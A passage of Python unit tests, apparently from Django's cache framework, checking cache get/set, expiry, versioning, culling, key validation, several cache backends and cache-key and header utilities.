Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) cache.set('deferred_queryset', defer_qs) self.assertEqual(expensive_calculation.num_runs, 1) runs_before_cache_read = expensive_calculation.num_runs cache.get('deferred_queryset') # We only want the default expensive calculation run on creation and set self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read) def test_expiration(self): # Cache values can be set to expire cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertEqual(cache.get("expire1"), None) cache.add("expire2", "newvalue") self.assertEqual(cache.get("expire2"), "newvalue") self.assertEqual(cache.has_key("expire3"), False) def test_unicode(self): # Unicode values can be cached stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } # Test `set` for (key, value) in stuff.items(): cache.set(key, value) self.assertEqual(cache.get(key), value) # Test `add` for (key, value) in stuff.items(): cache.delete(key) cache.add(key, value) self.assertEqual(cache.get(key), value) # Test `set_many` for (key, value) in stuff.items(): cache.delete(key) cache.set_many(stuff) for (key, value) 
in stuff.items(): self.assertEqual(cache.get(key), value) def test_binary_string(self): # Binary strings should be cacheable from zlib import compress, decompress value = 'value_to_be_compressed' compressed_value = compress(value.encode()) # Test set cache.set('binary1', compressed_value) compressed_result = cache.get('binary1') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test add cache.add('binary1-add', compressed_value) compressed_result = cache.get('binary1-add') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test set_many cache.set_many({'binary1-set_many': compressed_value}) compressed_result = cache.get('binary1-set_many') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) def test_set_many(self): # Multiple keys can be set using set_many cache.set_many({"key1": "spam", "key2": "eggs"}) self.assertEqual(cache.get("key1"), "spam") self.assertEqual(cache.get("key2"), "eggs") def test_set_many_expiration(self): # set_many takes a second ``timeout`` parameter cache.set_many({"key1": "spam", "key2": "eggs"}, 1) time.sleep(2) self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) def test_delete_many(self): # Multiple keys can be deleted using delete_many cache.set("key1", "spam") cache.set("key2", "eggs") cache.set("key3", "ham") cache.delete_many(["key1", "key2"]) self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) self.assertEqual(cache.get("key3"), "ham") def test_clear(self): # The cache can be emptied using clear cache.set("key1", "spam") cache.set("key2", "eggs") cache.clear() self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) def test_long_timeout(self): ''' Using a timeout greater than 30 days makes memcached think it is an absolute expiration timestamp instead of a relative offset. Test that we honour this convention. Refs #12399. ''' cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key2'), 'ham') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_forever_timeout(self): ''' Passing in None into timeout results in a value that is cached forever ''' cache.set('key1', 'eggs', None) self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', None) self.assertEqual(cache.get('key2'), 'ham') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_zero_timeout(self): ''' Passing in zero into timeout results in a value that is not cached ''' cache.set('key1', 'eggs', 0) self.assertEqual(cache.get('key1'), None) cache.add('key2', 'ham', 0) self.assertEqual(cache.get('key2'), None) cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0) self.assertEqual(cache.get('key3'), None) self.assertEqual(cache.get('key4'), None) def test_float_timeout(self): # Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2) self.assertEqual(cache.get("key1"), "spam") def _perform_cull_test(self, cull_cache, initial_count, final_count): # Create initial cache key entries. This will overflow the cache, # causing a cull. for i in range(1, initial_count): cull_cache.set('cull%d' % i, 'value', 1000) count = 0 # Count how many keys are left in the cache. for i in range(1, initial_count): if cull_cache.has_key('cull%d' % i): count = count + 1 self.assertEqual(count, final_count) def test_cull(self): self._perform_cull_test(caches['cull'], 50, 29) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 19) def test_invalid_keys(self): """ All the builtin backends (except memcached, see below) should warn on keys that would be refused by memcached. This encourages portable caching code without making it too difficult to use production backends with more liberal key rules. Refs #6447. """ # mimic custom ``make_key`` method being defined since the default will # never show the below warnings def func(key, *args): return key old_func = cache.key_func cache.key_func = func try: with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") # memcached does not allow whitespace or control characters in keys cache.set('key with spaces', 'value') self.assertEqual(len(w), 2) self.assertIsInstance(w[0].message, CacheKeyWarning) with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") # memcached limits key length to 250 cache.set('a' * 251, 'value') self.assertEqual(len(w), 1) self.assertIsInstance(w[0].message, CacheKeyWarning) finally: cache.key_func = old_func def test_cache_versioning_get_set(self): # set, using default version = 1 cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertEqual(cache.get('answer1', version=1), 42) self.assertEqual(cache.get('answer1', version=2), None) self.assertEqual(caches['v2'].get('answer1'), None) self.assertEqual(caches['v2'].get('answer1', version=1), 42) self.assertEqual(caches['v2'].get('answer1', version=2), None) # set, default version = 1, but manually override version = 2 cache.set('answer2', 42, version=2) self.assertEqual(cache.get('answer2'), None) self.assertEqual(cache.get('answer2', version=1), None) self.assertEqual(cache.get('answer2', version=2), 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), 42) # v2 set, using default version = 2 caches['v2'].set('answer3', 42) self.assertEqual(cache.get('answer3'), None) self.assertEqual(cache.get('answer3', version=1), None) self.assertEqual(cache.get('answer3', version=2), 42) self.assertEqual(caches['v2'].get('answer3'), 42) self.assertEqual(caches['v2'].get('answer3', version=1), None) self.assertEqual(caches['v2'].get('answer3', version=2), 42) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set('answer4', 42, version=1) self.assertEqual(cache.get('answer4'), 42) self.assertEqual(cache.get('answer4', version=1), 42) self.assertEqual(cache.get('answer4', version=2), None) self.assertEqual(caches['v2'].get('answer4'), None) self.assertEqual(caches['v2'].get('answer4', version=1), 42) self.assertEqual(caches['v2'].get('answer4', version=2), None) def test_cache_versioning_add(self): # add, default version = 1, but manually override version = 2 cache.add('answer1', 42, version=2) self.assertEqual(cache.get('answer1', version=1), None) 
self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=2) self.assertEqual(cache.get('answer1', version=1), None) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=1) self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) # v2 add, using default version = 2 caches['v2'].add('answer2', 42) self.assertEqual(cache.get('answer2', version=1), None) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37) self.assertEqual(cache.get('answer2', version=1), None) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37, version=1) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) # v2 add, default version = 2, but manually override version = 1 caches['v2'].add('answer3', 42, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), None) caches['v2'].add('answer3', 37, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), None) caches['v2'].add('answer3', 37) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), 37) def test_cache_versioning_has_key(self): cache.set('answer1', 42) # has_key self.assertTrue(cache.has_key('answer1')) self.assertTrue(cache.has_key('answer1', version=1)) self.assertFalse(cache.has_key('answer1', version=2)) self.assertFalse(caches['v2'].has_key('answer1')) self.assertTrue(caches['v2'].has_key('answer1', version=1)) self.assertFalse(caches['v2'].has_key('answer1', version=2)) def test_cache_versioning_delete(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.delete('answer1') self.assertEqual(cache.get('answer1', version=1), None) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.delete('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), None) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].delete('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), None) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].delete('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), None) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_incr_decr(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.incr('answer1') self.assertEqual(cache.get('answer1', version=1), 38) self.assertEqual(cache.get('answer1', version=2), 42) cache.decr('answer1') self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.incr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 43) cache.decr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].incr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', 
version=2), 43) caches['v2'].decr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 42) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].incr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 38) self.assertEqual(cache.get('answer4', version=2), 42) caches['v2'].decr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 37) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_get_set_many(self): # set, using default version = 1 cache.set_many({'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {}) # set, default version = 1, but manually override version = 2 cache.set_many({'ford2': 37, 'arthur2': 42}, version=2) self.assertEqual(cache.get_many(['ford2', 'arthur2']), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) # v2 set, using default version = 2 caches['v2'].set_many({'ford3': 37, 'arthur3': 42}) self.assertEqual(cache.get_many(['ford3', 'arthur3']), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1) self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {}) def test_incr_version(self): cache.set('answer', 42, version=2) self.assertEqual(cache.get('answer'), None) self.assertEqual(cache.get('answer', version=1), None) self.assertEqual(cache.get('answer', version=2), 42) self.assertEqual(cache.get('answer', version=3), None) self.assertEqual(cache.incr_version('answer', version=2), 3) self.assertEqual(cache.get('answer'), None) self.assertEqual(cache.get('answer', version=1), None) self.assertEqual(cache.get('answer', version=2), None) self.assertEqual(cache.get('answer', version=3), 42) caches['v2'].set('answer2', 42) 
self.assertEqual(caches['v2'].get('answer2'), 42) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertEqual(caches['v2'].get('answer2', version=3), None) self.assertEqual(caches['v2'].incr_version('answer2'), 3) self.assertEqual(caches['v2'].get('answer2'), None) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), None) self.assertEqual(caches['v2'].get('answer2', version=3), 42) self.assertRaises(ValueError, cache.incr_version, 'does_not_exist') def test_decr_version(self): cache.set('answer', 42, version=2) self.assertEqual(cache.get('answer'), None) self.assertEqual(cache.get('answer', version=1), None) self.assertEqual(cache.get('answer', version=2), 42) self.assertEqual(cache.decr_version('answer', version=2), 1) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.get('answer', version=1), 42) self.assertEqual(cache.get('answer', version=2), None) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertEqual(caches['v2'].decr_version('answer2'), 1) self.assertEqual(caches['v2'].get('answer2'), None) self.assertEqual(caches['v2'].get('answer2', version=1), 42) self.assertEqual(caches['v2'].get('answer2', version=2), None) self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2) def test_custom_key_func(self): # Two caches with different key functions aren't visible to each other cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertEqual(caches['custom_key'].get('answer1'), None) self.assertEqual(caches['custom_key2'].get('answer1'), None) caches['custom_key'].set('answer2', 42) self.assertEqual(cache.get('answer2'), None) self.assertEqual(caches['custom_key'].get('answer2'), 42) self.assertEqual(caches['custom_key2'].get('answer2'), 42) def test_cache_write_unpickable_object(self): update_middleware = UpdateCacheMiddleware() update_middleware.cache = cache fetch_middleware = FetchFromCacheMiddleware() fetch_middleware.cache = cache request = self.factory.get('/cache/test') request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data, None) response = HttpResponse() content = 'Testing cookie serialization.' 
response.content = content response.set_cookie('foo', 'bar') update_middleware.process_response(request, response) get_cache_data = fetch_middleware.process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, content.encode('utf-8')) self.assertEqual(get_cache_data.cookies, response.cookies) update_middleware.process_response(request, get_cache_data) get_cache_data = fetch_middleware.process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, content.encode('utf-8')) self.assertEqual(get_cache_data.cookies, response.cookies) def test_add_fail_on_pickleerror(self): "See https://code.djangoproject.com/ticket/21200" with self.assertRaises(pickle.PickleError): cache.add('unpickable', Unpickable()) def test_set_fail_on_pickleerror(self): "See https://code.djangoproject.com/ticket/21200" with self.assertRaises(pickle.PickleError): cache.set('unpickable', Unpickable()) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.db.DatabaseCache', # Spaces are used in the table name to ensure quoting/escaping is working LOCATION='test cache table' )) class DBCacheTests(BaseCacheTests, TransactionTestCase): available_apps = ['cache'] def setUp(self): # The super call needs to happen first for the settings override. super(DBCacheTests, self).setUp() self.create_table() def tearDown(self): # The super call needs to happen first because it uses the database. super(DBCacheTests, self).tearDown() self.drop_table() def create_table(self): management.call_command('createcachetable', verbosity=0, interactive=False) def drop_table(self): with connection.cursor() as cursor: table_name = connection.ops.quote_name('test cache table') cursor.execute('DROP TABLE %s' % table_name) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 18) def test_second_call_doesnt_crash(self): stdout = six.StringIO() management.call_command( 'createcachetable', stdout=stdout ) self.assertEqual(stdout.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES)) def test_createcachetable_with_table_argument(self): """ Delete and recreate cache table with legacy behavior (explicitly specifying the table name).
""" self.drop_table() stdout = six.StringIO() management.call_command( 'createcachetable', 'test cache table', verbosity=2, stdout=stdout ) self.assertEqual(stdout.getvalue(), "Cache table 'test cache table' created.\n") def test_clear_commits_transaction(self): # Ensure the database transaction is committed (#19896) cache.set("key1", "spam") cache.clear() transaction.rollback() self.assertEqual(cache.get("key1"), None) @override_settings(USE_TZ=True) class DBCacheWithTimeZoneTests(DBCacheTests): pass class DBCacheRouter(object): """A router that puts the cache table on the 'other' database.""" def db_for_read(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' def db_for_write(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' def allow_migrate(self, db, model): if model._meta.app_label == 'django_cache': return db == 'other' @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.db.DatabaseCache', 'LOCATION': 'my_cache_table', }, }, ) class CreateCacheTableForDBCacheTests(TestCase): multi_db = True def test_createcachetable_observes_database_router(self): old_routers = router.routers try: router.routers = [DBCacheRouter()] # cache table should not be created on 'default' with self.assertNumQueries(0, using='default'): management.call_command('createcachetable', database='default', verbosity=0, interactive=False) # cache table should be created on 'other' # Queries: # 1: check table doesn't already exist # 2: create the table # 3: create the index with self.assertNumQueries(3, using='other'): management.call_command('createcachetable', database='other', verbosity=0, interactive=False) finally: router.routers = old_routers class PicklingSideEffect(object): def __init__(self, cache): self.cache = cache self.locked = False def __getstate__(self): if self.cache._lock.active_writers: self.locked = True return {} @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.locmem.LocMemCache', )) class LocMemCacheTests(BaseCacheTests, TestCase): def setUp(self): super(LocMemCacheTests, self).setUp() # LocMem requires a hack to make the other caches # share a data store with the 'normal' cache. 
caches['prefix']._cache = cache._cache caches['prefix']._expire_info = cache._expire_info caches['v2']._cache = cache._cache caches['v2']._expire_info = cache._expire_info caches['custom_key']._cache = cache._cache caches['custom_key']._expire_info = cache._expire_info caches['custom_key2']._cache = cache._cache caches['custom_key2']._expire_info = cache._expire_info @override_settings(CACHES={ 'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other' }, }) def test_multiple_caches(self): "Check that multiple locmem caches are isolated" cache.set('value', 42) self.assertEqual(caches['default'].get('value'), 42) self.assertEqual(caches['other'].get('value'), None) def test_locking_on_pickle(self): """#20613/#18541 -- Ensures pickling is done outside of the lock.""" bad_obj = PicklingSideEffect(cache) cache.set('set', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") cache.add('add', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") def test_incr_decr_timeout(self): """incr/decr does not modify expiry time (matches memcached behavior)""" key = 'value' _key = cache.make_key(key) cache.set(key, 1, timeout=cache.default_timeout * 10) expire = cache._expire_info[_key] cache.incr(key) self.assertEqual(expire, cache._expire_info[_key]) cache.decr(key) self.assertEqual(expire, cache._expire_info[_key]) # memcached backend isn't guaranteed to be available. # To check the memcached backend, the test settings file will # need to contain at least one cache backend setting that points at # your memcache server. memcached_params = {} for _cache_params in settings.CACHES.values(): if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'): memcached_params = _cache_params @unittest.skipUnless(memcached_params, "memcached not available") @override_settings(CACHES=caches_setting_for_tests(base=memcached_params)) class MemcachedCacheTests(BaseCacheTests, TestCase): def test_invalid_keys(self): """ On memcached, we don't introduce a duplicate key validation step (for speed reasons), we just let the memcached API library raise its own exception on bad keys. Refs #6447. In order to be memcached-API-library agnostic, we only assert that a generic exception of some kind is raised. """ # memcached does not allow whitespace or control characters in keys self.assertRaises(Exception, cache.set, 'key with spaces', 'value') # memcached limits key length to 250 self.assertRaises(Exception, cache.set, 'a' * 251, 'value') # Explicitly display a skipped test if no configured cache uses MemcachedCache @unittest.skipUnless( memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache', "cache with python-memcached library not available") def test_memcached_uses_highest_pickle_version(self): # Regression test for #19810 for cache_key, cache in settings.CACHES.items(): if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache': self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL) def test_cull(self): # culling isn't implemented, memcached deals with it. pass def test_zero_cull(self): # culling isn't implemented, memcached deals with it. pass @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.filebased.FileBasedCache', )) class FileBasedCacheTests(BaseCacheTests, TestCase): """ Specific test cases for the file-based cache. 
""" def setUp(self): super(FileBasedCacheTests, self).setUp() self.dirname = tempfile.mkdtemp() for cache_params in settings.CACHES.values(): cache_params.update({'LOCATION': self.dirname}) def tearDown(self): shutil.rmtree(self.dirname) super(FileBasedCacheTests, self).tearDown() def test_ignores_non_cache_files(self): fname = os.path.join(self.dirname, 'not-a-cache-file') with open(fname, 'w'): os.utime(fname, None) cache.clear() self.assertTrue(os.path.exists(fname), 'Expected cache.clear to ignore non cache files') os.remove(fname) def test_clear_does_not_remove_cache_dir(self): cache.clear() self.assertTrue(os.path.exists(self.dirname), 'Expected cache.clear to keep the cache dir') def test_creates_cache_dir_if_nonexistent(self): os.rmdir(self.dirname) cache.set('foo', 'bar') os.path.exists(self.dirname) @override_settings(CACHES={ 'default': { 'BACKEND': 'cache.liberal_backend.CacheClass', }, }) class CustomCacheKeyValidationTests(TestCase): """ Tests for the ability to mixin a custom ``validate_key`` method to a custom cache backend that otherwise inherits from a builtin backend, and override the default key validation. Refs #6447. """ def test_custom_key_validation(self): # this key is both longer than 250 characters, and has spaces key = 'some key with spaces' * 15 val = 'a value' cache.set(key, val) self.assertEqual(cache.get(key), val) @override_settings( CACHES={ 'default': { 'BACKEND': 'cache.closeable_cache.CacheClass', } } ) class GetCacheTests(IgnorePendingDeprecationWarningsMixin, TestCase): def test_simple(self): from django.core.cache import caches, DEFAULT_CACHE_ALIAS, get_cache self.assertIsInstance( caches[DEFAULT_CACHE_ALIAS], get_cache('default').__class__ ) cache = get_cache( 'django.core.cache.backends.dummy.DummyCache', **{'TIMEOUT': 120} ) self.assertEqual(cache.default_timeout, 120) self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist') def test_close(self): from django.core import signals self.assertFalse(cache.closed) signals.request_finished.send(self.__class__) self.assertTrue(cache.closed) def test_close_deprecated(self): from django.core.cache import get_cache from django.core import signals cache = get_cache('cache.closeable_cache.CacheClass') self.assertFalse(cache.closed) signals.request_finished.send(self.__class__) self.assertTrue(cache.closed) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHE_MIDDLEWARE_SECONDS=1, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, USE_I18N=False, ) class CacheUtils(TestCase): """TestCase for django.utils.cache functions.""" def setUp(self): self.host = 'www.example.com' self.path = '/cache/test/' self.factory = RequestFactory(HTTP_HOST=self.host) def _get_request_cache(self, method='GET', query_string=None, update_cache=None): request = self._get_request(self.host, self.path, method, query_string=query_string) request._cache_update_cache = True if not update_cache else update_cache return request def _set_cache(self, request, msg): response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) def test_patch_vary_headers(self): headers = ( # Initial vary, new headers, resulting vary. 
(None, ('Accept-Encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'), ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ) for initial_vary, newheaders, resulting_vary in headers: response = HttpResponse() if initial_vary is not None: response['Vary'] = initial_vary patch_vary_headers(response, newheaders) self.assertEqual(response['Vary'], resulting_vary) def test_get_cache_key(self): request = self.factory.get(self.path) response = HttpResponse() key_prefix = 'localprefix' # Expect None if no headers have been set yet. self.assertEqual(get_cache_key(request), None) # Set headers to an empty list. learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) # Verify that a specified key_prefix is taken into account. learn_cache_key(request, response, key_prefix=key_prefix) self.assertEqual( get_cache_key(request, key_prefix=key_prefix), 'views.decorators.cache.cache_page.localprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_get_cache_key_with_query(self): request = self.factory.get(self.path, {'test': 1}) response = HttpResponse() # Expect None if no headers have been set yet. self.assertEqual(get_cache_key(request), None) # Set headers to an empty list. learn_cache_key(request, response) # Verify that the querystring is taken into account. self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' 'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e' ) def test_cache_key_varies_by_url(self): """ get_cache_key keys differ by fully-qualified URL instead of path """ request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com') learn_cache_key(request1, HttpResponse()) request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com') learn_cache_key(request2, HttpResponse()) self.assertTrue(get_cache_key(request1) != get_cache_key(request2)) def test_learn_cache_key(self): request = self.factory.head(self.path) response = HttpResponse() response['Vary'] = 'Pony' # Make sure that the Vary header is added to the key hash learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_patch_cache_control(self): tests = ( # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts (None, {'private': True}, set(['private'])), # Test whether private/public attributes are mutually exclusive ('private', {'private': True}, set(['private'])), ('private', {'public': True}, set(['public'])), ('public', {'public': True}, set(['public'])), ('public', {'private': True}, set(['private'])), ('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])), ('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])), ('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])), ) cc_delim_re = re.compile(r'\s*,\s*') for initial_cc, newheaders, expected_cc in tests: response = HttpResponse() if initial_cc is not None: response['Cache-Control'] = initial_cc patch_cache_control(response, **newheaders) parts = set(cc_delim_re.split(response['Cache-Control'])) self.assertEqual(parts, expected_cc) @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'KEY_PREFIX': 'cacheprefix', }, }, ) class PrefixedCacheUtils(CacheUtils): pass @override_settings( CACHE_MIDDLEWARE_SECONDS=60, CACHE_MIDDLEWARE_KEY_PREFIX='test', CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, ) class CacheHEADTest(TestCase): def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() def _set_cache(self, request, msg): response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) def test_head_caches_correctly(self): test_content = 'test content' request = self.factory.head(self.path) request._cache_update_cache = True self._set_cache(request, test_content) request = self.factory.head(self.path) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(test_content.encode(), get_cache_data.content) def test_head_with_cached_get(self): test_content = 'test content' request = self.factory.get(self.path) request._cache_update_cache = True self._set_cache(request, test_content) request = self.factory.head(self.path) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(test_content.encode(), get_cache_data.content) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, LANGUAGES=( ('en', 'English'), ('es', 'Spanish'), ), ) class CacheI18nTest(TestCase): def setUp(self): self.path = 